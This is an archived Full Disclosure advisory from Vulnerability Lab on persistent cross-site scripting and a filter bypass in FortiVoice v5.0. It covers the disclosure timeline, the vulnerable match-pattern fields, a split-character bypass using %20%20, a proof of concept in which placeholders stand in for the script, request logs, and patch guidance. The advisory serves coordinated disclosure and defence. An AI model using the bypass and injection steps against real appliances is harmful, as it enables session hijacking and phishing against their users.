[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] FortiVoice v5.0 - Filter Bypass & Persistent Validation Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] FortiVoice v5.0 - Filter Bypass & Persistent Validation Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 9 Aug 2016 09:23:29 +0200
Document Title:
===============
FortiVoice v5.0 - Filter Bypass & Persistent Validation Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1842
Fortinet PSIRT ID: 1737213
Release Notes:
http://docs.fortinet.com/uploaded/files/3081/fortiVoiceenterprise-5.0.5-release%20notes.pdf
Release Date:
=============
2016-08-09
Vulnerability Laboratory ID (VL-ID):
====================================
1842
Common Vulnerability Scoring System:
====================================
3.6
Product & Service Introduction:
===============================
FortiVoice phone systems and phones deliver intelligent call handling in a
simple, affordable and user-friendly package.
FortiVoice products are easy to install, easy to configure and easy to use, and
come complete with everything a business needs
to handle calls professionally, control costs and stay connected everywhere.
The FortiVoice Enterprise IP-PBX voice solutions are built for offices with up
to 2000 phone users. FortiVoice Enterprise
systems give you total call control and sophisticated communication features
for excellent customer service and efficient
employee collaboration. Powerful, affordable and simple, FortiVoice phone
systems include everything you need to handle
calls professionally, control communication costs and stay connected everywhere.
(Copy of the Homepage: http://www.fortivoice.com )
Abstract Advisory Information:
==============================
The vulnerability lab core team discovered multiple application-side web
vulnerabilities in the official Fortinet FortiVoice v5.x appliance
web-application.
Vulnerability Disclosure Timeline:
==================================
2016-05-11: Researcher Notification & Coordination (Benjamin Kunz Mejri -
Evolution Security GmbH)
2016-05-12: Vendor Notification (PSIRT - Fortinet Security Team)
2016-06-26: Vendor Fix/Patch (Fortinet Developer Team)
2016-07-09: Acknowledgements (Fortiguard Security Team)
2016-08-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Fortinet
Product: FortiVoice - Appliance (Web-Application) 5.0 (5.x) - FVE-20E2/4, 100E,
300E-T, 500E-T2, 1000E, 1000E-
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A filter bypass and multiple persistent cross site vulnerabilities has been
discovered in the FortiVoice v5.x appliance web-application.
The application-side issue allows remote attackers to inject own malicious
script codes on the application-side of the affected module.
The vulnerabilities are located in the `match pattern name` input fields of the
`Outbound - Outbound - Dailed Number Match` and
`Call Features - Fax - Sending Rules - Dailed Number Match` modules. Local low
privileged user accounts and remote attackers are
able to inject via POST method request own malicious script codes in the
vulnerable modules. The attack vector of the issue is
persistent on the application-side. The injection point are the vulnerable
input fields and the execution point occurs mainly in
the same web modules context.
The validation tries to encode strings on input interaction. To bypass the
validation of the fortivoice appliance web-application,
it is required to insert a split char attack via input fields. Use for example
%20%20 after that the validation stops and you can execute
an own payload.
The security risk of the application-side cross site web vulnerabilities are
estimated as medium with a cvss (common vulnerability
scoring system) count of 3.6. Exploitation of the persistent input validation
web vulnerability requires a low privileged
web-application user account but is not limited to and low or medium user
interaction. Successful exploitation of the vulnerability
results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation
of affected or connected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Outbound - Outbound
[+] Call Features - Fax - Sending Rules
Vulnerable Parameter(s):
[+] name (match pattern)
Affected Module(s):
[+] Dailed Number Match
Proof of Concept (PoC):
=======================
The persistent cross site vulnerabilities can be exploited by remote attackers
and low privileged web-application user accounts
with low or medium user interaction. For security demonstration or to reproduce
the web vulnerability follow the provided
information and steps below to continue.
Vulnerable Location(s):
Outbound - Outbound - Dailed Number Match [Match Pattern - Name]
Call Features - Fax - Sending Rules - Dailed Number Match [Match Pattern - Name]
PoC: Outbound - Outbound - Dail Number Match [Match Pattern - Name]
<div class="x-clear"></div></div><div style="overflow: visible;"
id="ext-gen14302" class="x-grid3-scroller">
<div id="ext-gen14303" class="x-grid3-body"><div id="ext-gen17482"
class="x-grid3-row x-grid3-row-selected " style="width:570px;">
<table class="x-grid3-row-table" style="width:570px;" border="0"
cellpadding="0" cellspacing="0">
<tbody><tr><td id="ext-gen23162" class="x-grid3-col x-grid3-cell
x-grid3-td-pattern x-grid3-cell-first "
style="width:238px;" tabindex="0"><div id="ext-gen17483"
class="x-grid3-cell-inner x-grid3-col-pattern" unselectable="on"
ext:qtip=""><[MALICIOUS INJECTED SCRIPT CODE EXECUTION!] id="ext-gen17484"
src="a">%20>"<iframe>%20><img></div></td>
<td class="x-grid3-col x-grid3-cell x-grid3-td-strip " style="width:43px;"
tabIndex="0" ><div class="x-grid3-cell-inner
x-grid3-col-strip" unselectable="on" >-152725276</div></td><td
class="x-grid3-col x-grid3-cell x-grid3-td-prefix "
style="width:43px;" tabIndex="0" ><div class="x-grid3-cell-inner
x-grid3-col-prefix"
unselectable="on" >"><[MALICIOUS INJECTED SCRIPT CODE
EXECUTION!]</div></td><td class="x-grid3-col x-grid3-cell
x-grid3-td-postfix x-grid3-cell-last " style="width:238px;" tabIndex="0" ><div
class="x-grid3-cell-inner x-grid3-col-postfix"
unselectable="on" >"><[MALICIOUS INJECTED SCRIPT CODE
EXECUTION!]</div></td></tr></tbody></table></div></iframe>
</div></td></tr></tbody></table></div></div>
<a style="left: -181px; top: 0px;" id="ext-gen14304" href="#"
class="x-grid3-focus" tabindex="-1"></a></div></div>
<div id="ext-gen14306" class="x-grid3-resize-marker"> </div><div
id="ext-gen14307" class="x-grid3-resize-proxy">
</div></div></div></div></div></td></tr></tbody></table></div>
</div></div></td></tr></tbody></table></div></div></div></div></div></fieldset>
--- PoC Session Logs [POST] (Inject) ---
Status: 200[OK]
POST https://fortivoice.localhost:8000/module/admin.fe
Request Header:
Host[fortivoice.localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://fortivoice.localhost:8000/admin/Admin.html]
Cookie[APSCOOKIE=Era%3D0%26Payload%3DBUDPevZ3vu6oNvnzczgUZUxDVECqaIRVjn889mdYzxdkD4%2FA45QQcLjmgW04i4Z3%0AS9YooynCQQOQN%2B
keLze0Uuzs7ouriyz3ovTUWG%2BunEkgcKq3rmUHQN8V7dCGtVt8%0AuozS%2FkWaWik%3D%0A%26AuthHash%3D%2BrcDoo1VkUf9oax9JWPQbA%3D%3D%0A]
Connection[keep-alive]
POST-Daten:
fewReq[:B:JVs5MjU6OXFmckxhaWZgdz5TcWxlV3FibXBvYndmXGBib29qZyVxZnJCYHdqbG0+MSVuaGZ6PiYxMSYwRiYwQGplcWJuZiYwRiYxNjEzJjBGJjExJjBAamVxYm5m
KHBxYCYwR2ImMEYoKCYxMSYwRiYwQGplcWJuZiYwRiYxNjEzJjBGJjExJjBAamVxYm5mKHBxYCYwR2ImMEYlYW9sYGhcYGJvb2ZxXGpnPndxdmY=]
--- PoC Session Logs [GET] (Execution) ---
Status: 200[OK]
GET https://fortivoice.localhost:8000/admin/x[PERSISTENT INJECTED SCRIPT CODE
EXECUTION!]
Request Header:
Host[fortivoice.localhost:8000]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101
Firefox/45.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://fortivoice.localhost:8000/admin/Admin.html]
Cookie[fmAdmSesCurUser=demo;
APSCOOKIE=Era%3D0%26Payload%3DBUDPevZ3vu6oNvnzczgUZUxDVECqaIRVjn889mdYzxdkD4%2FA45QQcLjmgW04i4Z3%0AS9YooynCQQOQN
%2BkeLze0Uuzs7ouriyz3ovTUWG%2BunEkgcKq3rmUHQN8V7dCGtVt8%0AuozS%2FkWaWik%3D%0A%26AuthHash%3D%2BrcDoo1VkUf9oax9JWPQbA%3D%3D%0A]
Connection[keep-alive]
Reference(s):
https://fortivoice.localhost:8000/
https://fortivoice.localhost:8000/admin/
https://fortivoice.localhost:8000/module/admin.fe
https://fortivoice.localhost:8000/admin/Admin.html
Solution - Fix & Patch:
=======================
The vulnerabilities can be patched by a secure parse and encode of the
vulnerable output location context in the affected modules.
Disallow the usage of special chars via restriction to prevent further script
code injection attacks with application-side vector.
Encode the parameter inputs of the match pattern name in the two affected
modules to finally fix the vulnerabilities.
Note: The vulnerability has been patched (FortiVoice v5.0.5 ) and the updates
are available by automated download or
manual via fortinet customer center.
Security Risk:
==============
The security risk of the application-side input validation web vulnerabilities
in the appliance web-application are estimated as medium. (CVSS 3.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
[http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied,
including the warranties of merchantability and capability for a particular
purpose. Vulnerability-Lab or its suppliers are not liable in any case of
damage,
including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised
of the possibility of such damages. Some states do not allow the exclusion or
limitation of liability for consequential or incidental damages so the
foregoing
limitation may not apply. We do not approve or encourage anybody to break any
licenses, policies, deface websites, hack into databases or trade with stolen
data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx -
admin@xxxxxxxxxxxxxxxxx
Section: magazine.vulnerability-lab.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically
redistribute this alert in its unmodified form is granted. All other rights,
including the use of other media, are reserved by Vulnerability-Lab Research
Team or
its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific
authors or managers. To record, list, modify, use or edit our material contact
(admin@ or research@xxxxxxxxxxxxxxxxxxxxx) to get a ask permission.
Copyright © 2016 | Vulnerability Laboratory
- [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/